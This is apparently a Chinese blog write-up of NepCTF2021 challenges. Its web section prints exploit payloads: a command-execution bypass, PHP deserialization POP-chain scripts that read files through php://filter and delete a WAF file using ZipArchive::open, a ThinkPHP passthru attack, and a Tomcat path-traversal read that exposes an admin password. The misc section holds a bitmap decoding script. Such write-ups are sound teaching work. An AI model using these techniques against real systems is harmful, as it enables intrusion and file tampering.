nepctf2021
web
little_trick
非常简单的命令执行绕过
substr(0,-1)从最后开始过,
echo`nl%20*`;
梦里花开牡丹亭
<?php
highlight_file(__FILE__);
error_reporting(0);
include('shell.php');
class Game{public $username;public $password;public $choice;public $register;public $file;public $filename;public $content;public function __construct(){$this->username='user';$this->password='user';}public function __wakeup(){if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){$this->choice=new login($this->file,$this->filename,$this->content);}else{$this->choice = new register();}}public function __destruct() {$this->choice->checking($this->username,$this->password);}
}
class login{public $file;public $filename;public $content;public function __construct($file,$filename,$content){$this->file=$file;$this->filename=$filename;$this->content=$content;}public function checking($username,$password){if($username==='admin'&&$password==='admin'){$this->file->open($this->filename,$this->content);die('login success you can to open shell file!');}}
}
class register{public function checking($username,$password){if($username==='admin'&&$password==='admin'){die('success register admin');}else{die('please register admin ');}}
}
class Open{function open($filename, $content){if(!file_get_contents('waf.txt')){shell($content);}else{echo file_get_contents($filename.".php");}}
}
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){@unserialize(base64_decode($_POST['unser']));
}
这个代码的链不难找
Game::wakeup->login::checking->Open::open
先看看shell.php里是些什么东西
exp1
<?php
class Game{public $username;public $password;public $choice;public $register;public $file;public $filename;public $content;public function __construct(){$this->username='admin';$this->password='admin';$this->register='admin';$this->file=new Open();$this->filename="php://filter/read=convert.base64-encode/resource=shell";$this->content="ls";}
}
class login{public $file;public $filename;public $content;
}
class Open{}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));?>
发现里面有个命令执行绕过
而想要调用shell函数就必须要让waf.txt不存在
搜索发现可以用原生类的同名函数open来进行删除
原生类讲解
ZipArchive::open
这个类可以将文件覆盖删除
exp2
<?php
class Game{public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;public function __construct()
{$this->username='admin';
$this->password='admin';
$this->register='admin';
$this->file=new ZipArchive();
$this->filename="waf.txt";
$this->content=ZIPARCHIVE::OVERWRITE;
}
}
class login{public $file;
public $filename;
public $content;
}
class Open{}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));?>
此时waf.txt已经删除
再命令执行绕过即可
n\l /flag
fake_revenge
下载下来发现是ThinkPHP框架,直接用payload打
发现禁了一些函数
发现能用passthru
cat flag即可
easy_tomcat
进去发现要登录
测试一波弱密码,sql注入,无果,扫下目录
注册登录
发现head_path参数,也许存在任意文件读取
用绝对路径配合绕过
static/img/../../WEB-INF/web.xml
而网页注释写了尝试admin
读取LoginServelet.class,base64解码是这些玩意,看看InitServlet这个初始化
看到admin密码
admin/no_one_knows_my_password_75767388428345
进去发现有之前登陆的账号,并且可以删除
发现他传的是json的东西,而之前读取AdminServlet文件内容时,里面刚好有fastjson的东西
vn前不久刚出
https://blog.csdn.net/SopRomeo/article/details/114945759?spm=1001.2014.3001.5501
绕过都没有
misc
签到
将数据循环二进制输出即可
# -*- coding: utf-8 -*-
# @File : test
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date : 2021/3/20 10:58
flag =[0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffff9ffffffffffff,0xfffffffffffffffffff5f0001fffffff,0xfffffffffffffffe000407ffcfffffff,0xfffffffffffffff8fffffffff7ffffff,0xfffffffffffffff3fffffffff3ffffff,0xffffffffffffffcffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffcffffff,0xfffffffffffffffffffffffffcffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffff0000ffffffffffff,0xfffffffffffffffe7fff1f9fffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffe1fffffffffffdffffffffffff,0xffffff8cfffffffffffdffffffffffff,0xfff03fbf7ffffffffffbffffffffffff,0xffe79f3f3ffffffffffbffffffffffff,0xffefde7fbffffffffffbffffffffffff,0xffefeeff9ffffffffffbffffffffffff,0xffefe6ffdffffffffff9ffffffffffff,0xffcff6ffdffffffffffcffffffffffff,0xffdffaffcffffffffffe3fffffffffff,0xffdff8ffefffffffffff800fffffffff,0xffdff9ffefffffffffff0fffffffffff,0xffdffdffeffffffffffc7fffffffffff,0xffdffffff7fffffffff3ffffffffffff,0xffdffffff7fffffffff7ffffffffffff,0xffdffffff7ffffffffffffffffffffff,0xffdfff9fffffffffffffff7fffffffff,0xffffffbfffffffffffffff3fffffffff,0xffffff7ffffffffffffc1fbfffffffff,0xffffff7ffffffffffff9df9fffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff9ffffffffffffbdf9fffffffff,0xffffffcffffffffffffbdfbfffffffff,0xffffffe3fffffffffffbdfbfffffffff,0xffffffc007fffffffffbdf3fffffffff,0xffffff1f83fffffffff9df7fffffffff,0xfffffe7ffffffffffffcdcffffffffff,0xfffffefffffffffffffe01ffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffff3ffffffffffffffffffffff,0xfffffff3e7ffffffffffffffffffffff,0xffffffc78ffffffffff8ffffffffffff,0xffffffb03fffffffffff3fffffffffff,0xffffff23ffffffffffff87ffffffffff,0xffffff787ffffffffffff0ffffffffff,0xffffff7f9ffffffffffffc7fffffffff,0xffffff7fc7fffffffffff1ffffffffff,0xffffff7ff3ffffffffffc7ffffffffff,0xffffffbffbffffffffff1fffffffffff,0xffffffcffbfffffffffcffffffffffff,0xffffffe7e7ffffffffe1ffffffffffff,0xfffffff80fffffffffefffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffe3ffffffffff,0xfffffffffffffffff01f89ffffffffff,0xffffffffffffffffc7cf3cffffffffff,0xffffffffffffffff9fee7effffffffff,0xfffffffffbffffff3ff6feffffffffff,0xfffffffffbffffff7ff2fe7fffffffff,0xfffffffffbffffff7ffaff7fffffffff,0xfffffffffbfffffefff8ff7fffffffff,0xfffffffffbfffffefffcff7fffffffff,0xfffffffffbfffffefffcff3fffffffff,0xfffffffffbfffffefffcffbfffffffff,0xfffffffffbfffffeffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbfffffc00ffffffffffffff,0xfffffffffbfffffbff00001fffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffffffffffffdfcffffffffff,0xfffffffffffffffffffbfeffffffffff,0xfffffffffffffffffff3fe7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffe1ffffffffff7ff7fffffffff,0xfffffff0fffffffffff7ff7fffffffff,0xffffff8ffffffffffff7feffffffffff,0xfffffff3fffffffffff9f0ffffffffff,0xfffffffcfffffffffffe07ffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffc0ffffffffffffffffffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xff8001fffffffffffffffff7ffffffff,0xffbffc00fffffffffffffff7ffffffff,0xff7ffffe1ffffffffffffff7ffffffff,0xff7fffffcffffffffffffff7ffffffff,0xff7fffffe7fffffffffffff7ffffffff,0xff3ffffff3fffffffffffff7ffffffff,0xffbffffffbfffffffffffff7ffffffff,0xff7ffffff3fffffffffffff7ffffffff,0xff83ffffe7fffffffffffff7ffffffff,0xfff83fffcffffffffffffff7ffffffff,0xffff80003ffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffbffffffffffffffffffff7ffffffff,0xff9ffffffffffffffffffff7ffffffff,0xffdffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfffbfffffffffffffffffff7ffffffff,0xfff9fffffffffffffffffff7ffffffff,0xfffdfffffffffffffffffff7ffffffff,0xfffcfffffffffffffffffff7ffffffff,0xfffefffffffffffffffffff7ffffffff,0xfffe7ffffffffffffffffff7ffffffff,0xffff3ffffffffffffffffff7ffffffff,0xffffbfffffffffffffffffffffffffff,0xffffbfffffffffffffffffffffffffff,0xffff9f003fffffffffffffffffffffff,0xffffc07f83ffffffffffffffffffffff,0xffff9fffffffffff8000001fffffffff,0xffff3fffffffffff3fffffcfffffffff,0xfffe7ffffffffffe7fffffe7ffffffff,0xfffcfffffffffffcfffffff3ffffffff,0xfff9fffffffffffc1ffffff3ffffffff,0xfff3fffffffffffe7fffffc7ffffffff,0xffe7ffffffffffff03ffe01fffffffff,0xffdffffffffffffff8000fffffffffff,0xff3fffffffffffffffffffffffffffff,0xfe7fffffffffffffffffffffffffffff,0xf8ffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffefffe03ffffffffff,0xffffffffffffffff7ffcf8ffffffffff,0xfbffffffffffffff7ff9feffffffffff,0xf3ffffffffffffff7ff3ff7fffffffff,0xe7ffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffdfffffffff,0xeffffffffcffffffbff7ffdfffffffff,0xeffffffffeffffffbff7ffdfffffffff,0xe7fffc0ffeffffffbff7ffcfffffffff,0xf3fff9e07effffffbff7ffefffffffff,0xf80017ff80ffffffbff7ffefffffffff,0xffffd7ffffffffff0037ffefffffffff,0xffffc7ffffffffffffc3ffefffffffff,0xffffefffffffffffffffffefffffffff,0xffffefffffffffffffffffcfffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffe03fffffffffffffffffffffffff,0xffffcf9fffffffffffffffffffffffff,0xffff9fdffffffffffffffff7ffffffff,0xffffbfdffffffffffffffff7ffffffff,0xffffbfcffffffffffffffff7ffffffff,0xffff3feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff000000007ffffffffff7ffffffff,0xffffbffffffe7ffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffffffdffffffffffffffff7ffffffff,0xffffffcffffffffffffffff7ffffffff,0xffff07effffffffffffffff7ffffffff,0xffff73effffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff9bcffffffffffffffff7ffffffff,0xffffc3dffffffffffffffff7ffffffff,0xfffff01ffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfcfffffffffffffffffffff7ffffffff,0xfe1ffffffffffffffffffff7ffffffff,0xffe0fffffffffffffffffff7ffffffff,0xfffe07fffffffffffffffff7ffffffff,0xfffff00ffffffffffffffff7ffffffff,0xffffffeffffffffffffffff7ffffffff,0xffffff8ffffffffffffffff7ffffffff,0xfffffe3ffffffffffffffff7ffffffff,0xfffff8ffffffffffffffffffffffffff,0xffffe3ffffffffffffffffffffffffff,0xfffe1fffffffffffffffffffffffffff,0xffc0ffffffffffffffffffffffffffff,0xfc1fffffffffffffffffffffffffffff,0xfc7fffffffffffffffffffffffffffff,0xff807fffffffffffffffffffffffffff,0xffff01ffffffffffffffffffffffffff,0xfffffc07ffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff]
test=""
for i in flag:print("{:b}".format(i))
看图识字
出题人日记
改为zip后发现字符
凯撒密码
搜索js图片隐写
js隐写
js隐写工具下载
解密这个图即可
crypto
Real_Base
身为一个web
nepctf2021相关推荐
- NepCTF2021 梦里花开牡丹亭
知识点 1.数组绕过 2.pop链 3.ZipArchive 内置类的open方法达到删除文件效果 php内置类ZipArchive :: open($filename, $flags = null ...
- NepCTF2021一些web题目的总结与复现
前言 参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,所以当时只做了两道题目,赛后认真看了一下php,因为只会php(我太菜了呜呜呜),主要还是提供思路,还 ...
- CTF php反序列化总结
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~ php反序列化 定义:序列化就是将对象转换成字符串.反 ...
- PHP反序列化原生类利用
前言 之前对反序列化原生类进行过总结,但可能总结的方面不同,在ctf用到的很少,所以这里在对ctf常用原生类进行一次总结. 原生类 php中内置很多原生的类,在CTF中常以echo new $a($b ...
最新文章
- SQL 2008 安装资料及下载地址
- 用总计金额求本体额与消费税额FM,所引起的金额误差问题
- C++ getline() 和 get()
- 取出响应头中包含多个set-cookie的值
- 闭包--闭包作用之保护(一)
- 在Ocelot中使用自定义的中间件(二)
- 计算机综合基础作业,《计算机网络基础》综合作业(参考答案).doc
- Python装饰器详解,详细介绍它的应用场景
- python字典键值可以是元组或列表吗_Python列表、元组、字典、集合的内置使用方法...
- caffe测试单张图片
- WIFI远程控制实例分享,喜欢你就来!
- C语言 求素数、排序算法
- mumu模拟器android调试,使用MuMu模拟器调试AndroidStudio项目
- 计算机硬件连接子系统,网络综合布线七大子系统详细讲解
- java尾行注释有什么不好_注释不好吗?
- 有限等距性质RIP理解
- 邮箱客户端如何登录?
- IP-GUARD全盘扫描任务优化
- picked up java_tool_options:_解决ubuntu中JDK的Picked up JAVA_TOOL_OPTIONS提示问题。
- 设计模式---代理(Proxy)模式